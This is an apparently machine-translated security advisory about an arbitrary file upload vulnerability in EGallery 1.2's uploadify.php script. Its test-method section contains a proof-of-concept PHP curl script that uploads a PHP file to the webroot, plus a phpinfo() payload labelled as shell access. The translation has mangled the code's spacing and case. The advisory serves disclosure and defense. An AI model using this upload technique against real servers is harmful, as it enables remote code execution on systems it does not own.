EGallery uploadify. php Arbitrary File Upload Vulnerability

Release date:
Updated on:

Affected Systems:
Sourceforge EGallery 1.x
Description:
--------------------------------------------------------------------------------
EGallery is an automatic PHP graphics library.

EGallery 1.2 version egallery/uploadify. php script allows you to upload files with any extension to a folder in webroot. by uploading malicious PHP scripts, this vulnerability can be exploited to execute arbitrary PHP code.

<* Source: Sammy Forgit

Link: http://secunia.com/advisories/49941/
Http://www.opensyscom.fr/Actualites/egallery-arbitrary-file-upload-vulnerability.html
*>

Test method:
--------------------------------------------------------------------------------

Alert

The following procedures (methods) may be offensive and are intended only for security research and teaching. Users are at your own risk!

Sammy Forgit () provides the following test methods:

PostShell. php
<? Php

$ Uploadfile = "lo. php ";

$ Ch = curl_init ("http: // localhost/egallery/uploadify. php? Folder =/egallery /");
Curl_setopt ($ ch, CURLOPT_POST, true );
Curl_setopt ($ ch, CURLOPT_POSTFIELDS, array ('filedata' => "@ $ uploadfile "));
Curl_setopt ($ ch, CURLOPT_RETURNTRANSFER, 1 );
$ PostResult = curl_exec ($ ch );
Curl_close ($ ch );

Print "$ postResult ";

?>

Shell Access: http: // localhost/egallery/lo. php

Lo. php
<? Php
Phpinfo ();
?>

Suggestion:
--------------------------------------------------------------------------------
Vendor patch:

Sourceforge
-----------
Currently, the vendor does not provide patches or upgrade programs. We recommend that users who use the software follow the vendor's homepage to obtain the latest version:

Http://jocr.sourceforge.net/index.html